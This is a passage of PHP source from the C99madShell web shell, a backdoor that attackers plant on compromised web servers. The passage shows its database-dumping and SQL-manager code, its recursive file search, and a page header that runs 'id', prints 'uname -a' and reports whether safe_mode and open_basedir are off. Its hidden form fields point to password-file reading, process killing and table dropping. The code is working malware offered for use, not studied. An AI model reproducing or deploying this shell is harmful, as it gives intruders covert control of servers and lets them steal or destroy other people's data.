 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
  if ((in_array($tab,$onlytabs)) or (!$c))
  {
   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
   // recieve query for create table structure
   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
   if (!$res) {$ret["err"][] = mysql_smarterror();}
   else
   {
    $row = mysql_fetch_row($res);
    $out .= $row["1"].";\n\n";
    // recieve table variables
    $res = mysql_query("SELECT * FROM `$tab`", $sock);
    if (mysql_num_rows($res) > 0)
    {
     while ($row = mysql_fetch_assoc($res))
     {
      $keys = implode("`, `", array_keys($row));
      $values = array_values($row);
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
      $values = implode("', '", $values);
      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
      $out .= $sql;
     }
    }
   }
  }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
  $fp = fopen($file, "w");
  if (!$fp) {$ret["err"][] = 2;}
  else
  {
   fwrite ($fp, $out);
   fclose ($fp);
  }
 }
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $out;
}
}
if (!function_exists("mysql_buildwhere"))
{
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}
 $result = "";
 foreach($array as $k=>$v)
 {
  $value = "";
  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  $value .= "'".addslashes($v)."'";
  if (!empty($functs[$k])) {$value .= ")";}
  $result .= "`".$k."` = ".$value.$sep;
 }
 $result = substr($result,0,strlen($result)-strlen($sep));
 return $result;
}
}
if (!function_exists("mysql_fetch_all"))
{
function mysql_fetch_all($query,$sock)
{
 if ($sock) {$result = mysql_query($query,$sock);}
 else {$result = mysql_query($query);}
 $array = array();
 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 mysql_free_result($result);
 return $array;
}
}
if (!function_exists("mysql_smarterror"))
{
function mysql_smarterror($type,$sock)
{
 if ($sock) {$error = mysql_error($sock);}
 else {$error = mysql_error();}
 $error = htmlspecialchars($error);
 return $error;
}
}
if (!function_exists("mysql_query_form"))
{
function mysql_query_form()
{
 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 $sql_query = urldecode($sql_query);
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 if ((!$submit) or ($sql_act))
 {
  echo "<table border=0><tr><td><form method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  if ($tbl_struct)
  {
   echo "<td valign=\"top\"><b>Fields:</b><br>";
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
   echo "</td></tr></table>";
  }
 }
 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db"))
{
function mysql_create_db($db,$sock="")
{
 $sql = "CREATE DATABASE `".addslashes($db)."`;";
 if ($sock) {return mysql_query($sql,$sock);}
 else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse"))
{
function mysql_query_parse($query)
{
 $query = trim($query);
 $arr = explode (" ",$query);
 /*array array()
 {
  "METHOD"=>array(output_type),
  "METHOD1"...
  ...
 }
 if output_type == 0, no output,
 if output_type == 1, no output if no error
 if output_type == 2, output without control-buttons
 if output_type == 3, output with control-buttons
 */
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $result = array();
 $op = strtoupper($arr[0]);
 if (is_array($types[$op]))
 {
  $result["propertions"] = $types[$op];
  $result["query"]  = $query;
  if ($types[$op] == 2)
  {
   foreach($arr as $k=>$v)
   {
    if (strtoupper($v) == "LIMIT")
    {
     $result["limit"] = $arr[$k+1];
     $result["limit"] = explode(",",$result["limit"]);
     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
     unset($arr[$k],$arr[$k+1]);
    }
   }
  }
 }
 else {return FALSE;}
}
}
if (!function_exists("c99fsearch"))
{
function c99fsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== FALSE)
 {
  if($f != "." && $f != "..")
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {c99fsearch($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
}
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
 global $gzipencode,$ft;
 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
 {
  $v = @ob_get_contents();
  @ob_end_clean();
  @ob_start("ob_gzHandler");
  echo $v;
  @ob_end_flush();
 }
}
function c99shexit()
{
 onphpshutdown();
 exit;
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir");
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = TRUE;
 $hsafemode = "<font color=red>ON (secure)</font>";
}
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string",$highlight_string); //#DD0000
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
else
{
 $wd = FALSE;
 $wdt = "<font color=red>[ Read-Only ]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
if (is_callable("disk_free_space"))
{
 $free = disk_free_space($d);
 $total = disk_total_space($d);
 if ($free === FALSE) {$free = 0;}
 if ($total === FALSE) {$total = 0;}
 if ($free < 0) {$free = 0;}
 if ($total < 0) {$total = 0;}
 $used = $total-$free;
 $free_percent = round(100/($total/$free),2);
 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z") as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\");}
  if ($bool)
  {
   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "<font color=green>".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
}
if (count($quicklaunch) > 0)
{
 foreach($quicklaunch as $item)
 {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d."..");
  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
 
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
 }
}
echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
 echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>");
 
 if (isset($_POST['sql_login']))  {$sql_login=htmlspecialchars($_POST['sql_login']);}
 if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);}
 if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);}
 if (isset($_POST['sql_port']))   {$sql_port=htmlspecialchars($_POST['sql_port']);}
 if (isset($_POST['sql_db']))     {$sql_db=htmlspecialchars($_POST['sql_db']);}
 if (isset($_POST['sql_act']))     {$sql_act=htmlspecialchars($_POST['sql_act']);}
 if (isset($_POST['sql_tbl']))     {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);}
 if (isset($_POST['sql_tbl_act']))     {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);}
 if (isset($_POST['thistbl']))     {$thistbl=htmlspecialchars($_POST['thistbl']);}
 if (isset($_POST['sql_order']))     {$sql_order=htmlspecialchars($_POST['sql_order']);}
 if (isset($_POST['sql_tbl_ls']))     {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);}
 if (isset($_POST['sql_tbl_le']))     {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);}
 if (isset($_POST['sql_query']))     {$sql_query=htmlspecialchars($_POST['sql_query']);}
 if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));}
 if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);}
 if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);}
 
 
 
 ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
 if ($sql_server)
 {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = FALSE;}
 echo "<b>SQL Manager:</b><br>";
 if (!$sql_sock)
 {
  if (!$sql_server) {echo "NO CONNECTION";}
  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
 }
 else
 {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
  $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
  $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();");
  $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();");
  $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();");
  $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();");
  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  echo "</center>";
 }
 echo "</td></tr><tr>";
 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
 else
 {
  //Start left panel
  if (!empty($sql_db))
  {
   ?><td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login)) ?>';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd)) ?>';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server)) ?>';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port)) ?>';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
   }
  }
  else
  {
   ?><td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    ?><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (".$c.")</option>";
    echo $dbs;
   }
   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  }
  //End left panel
  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  //Start center panel
  $diplay = TRUE;
  if ($sql_db)
  {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
   echo "</b></center>";
   $acts = array("","dump");
   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
   elseif ($sql_tbl_act == "insert")
   {
    if ($sql_tbl_insert_radio == 1)
    {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
